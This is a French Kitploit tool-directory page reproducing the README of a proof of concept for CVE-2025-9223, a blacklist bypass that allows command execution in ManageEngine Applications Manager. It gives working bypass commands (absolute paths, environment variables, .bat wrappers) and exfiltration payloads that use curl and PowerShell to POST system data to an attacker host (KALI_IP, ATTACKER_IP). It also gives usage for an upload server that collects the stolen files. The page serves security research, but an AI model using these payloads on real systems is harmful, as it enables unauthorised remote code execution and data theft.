Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
Outils/GitHubGitHub/networkkiller/cve-2025-9223
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration TestingCommand and ControlLearning & Education
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Applications Manager - Bypass de l'action d'exécution de programme (Preuve de Concept)

Security Research Python 3.x Proof of Concept

📖 Description

Ce dépôt contient une Preuve de Concept (PoC) qui démontre une vulnérabilité d'exécution de commandes dans la fonction « Execute Program Action » de ManageEngine Applications Manager.

🔍 Détails de la vulnérabilité

Applications Manager utilise une liste noire (BlackListCommands) pour bloquer les commandes dangereuses, mais la validation présente des failles critiques :

  • Validation basée sur des chaînes uniquement sur le premier jeton
  • Absence de normalisation des chemins ou d'expansion des variables d'environnement
  • Aucune protection contre l'exécution indirecte via des scripts

🚨 Méthodes de contournement

MéthodeExemple
Chemin absoluC:\Windows\System32\netstat.exe
Variables d'environnement%SystemRoot%\System32\netstat.exe
Script wrapperecho netstat > a.bat && a.bat

💥 Impact

  • ✅ Exécution de code à distance (RCE) authentifiée sur l'hôte Applications Manager
  • ✅ Exécution complète de commandes système en contournant les restrictions de sécurité
  • ✅ Exfiltration de données à l'aide d'utilitaires système (curl, powershell, certutil)

📤 Exemple de payload d'exfiltration

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ Configuration et utilisation

Prérequis

  • Python 3.x
  • Accès réseau à l'instance Applications Manager cible
  • Accès authentifié avec les autorisations « Execute Program Action »

Serveur de téléchargement de fichiers

Le script upload_server.py fournit un serveur HTTP simple pour recevoir les fichiers exfiltrés.

Utilisation de base

root@kitploit:~
python3 upload_server.py

Options avancées

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

Paramètres

  • --host : Adresse de liaison (par défaut : 0.0.0.0)
  • --port : Port HTTP (par défaut : 8000)
  • --dir : Répertoire de sortie (par défaut : répertoire courant)

Points d'API

Fonctionnalités de sécurité

✅ Protection contre le path traversal
✅ Noms de fichiers uniques avec horodatage
✅ Enregistrement des requêtes avec IP et User-Agent
✅ Validation du type de contenu

🎯 Commandes de test

Créez un fichier test_commands.txt avec des exemples de contournement :

root@kitploit:~
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ Avis légal

IMPORTANT : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.

❌ NE PAS utiliser sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test
❌ NE PAS utiliser pour toute activité illégale
✅ OUI utiliser uniquement dans des environnements contrôlés pour la recherche en sécurité
✅ OUI obtenir une autorisation adéquate avant d'effectuer des tests

L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Les utilisateurs assument l'entière responsabilité et les risques.

📄 Licence

Ce projet est uniquement destiné à des fins de recherche et d'éducation. Tous droits réservés.

👨‍💻 Auteur

Johan Aybar - À des fins éducatives


⚠️ RAPPEL : Cette PoC doit être utilisée uniquement dans des environnements de test autorisés. Toute utilisation non autorisée peut être illégale et est strictement interdite.

Télécharger l’outil
MéthodeEndpointDescription
GET/Liste les fichiers téléchargés récemment
POST/uploadTélécharge des fichiers (multipart/form-data)
PUT/upload/[filename]Chargement direct de fichiers